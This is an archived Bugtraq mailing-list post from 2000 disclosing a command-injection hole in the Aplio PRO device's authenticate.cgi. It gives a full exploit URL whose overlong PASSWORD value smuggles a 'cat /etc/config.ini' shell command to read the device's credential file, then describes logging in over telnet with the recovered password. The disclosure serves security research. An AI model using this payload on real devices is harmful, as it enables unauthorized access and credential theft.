Bugtraq: Fwd: APlio PRO web shell

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Fwd: APlio PRO web shell

From: Anthony Pardini <tony () WATTERS COM>
Date: Fri, 6 Oct 2000 16:58:58 -0500

This URL allows for the execution of commands via /bin/sh

http://ip/cgi-bin/authenticate.cgi?PASSWORD=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx010110101010101010101010110101010101010101010101010101010101010101010101010110101010101010298347019283740918273409182734091872340981723409871230498712309847109283740192834709128734091827340987123409XXcat%20%2Fetc%2Fconfig.ini

After this you can telnet in by using the passwd in the config file...
They must setup this feature as there doesn't seem to be a default password and
there must be a password to login.

version

uClinux release 2.0.33, build #1 Wed May 31 11:55:22 CEST 2000
uClinux/Aplio release 1.1.16, build # Wed May 31 11:57:37 CEST 2000

http://www.aplio.com
-------------------------------------------------------

By Date By Thread

Current thread:

Fwd: APlio PRO web shell Anthony Pardini (Oct 08)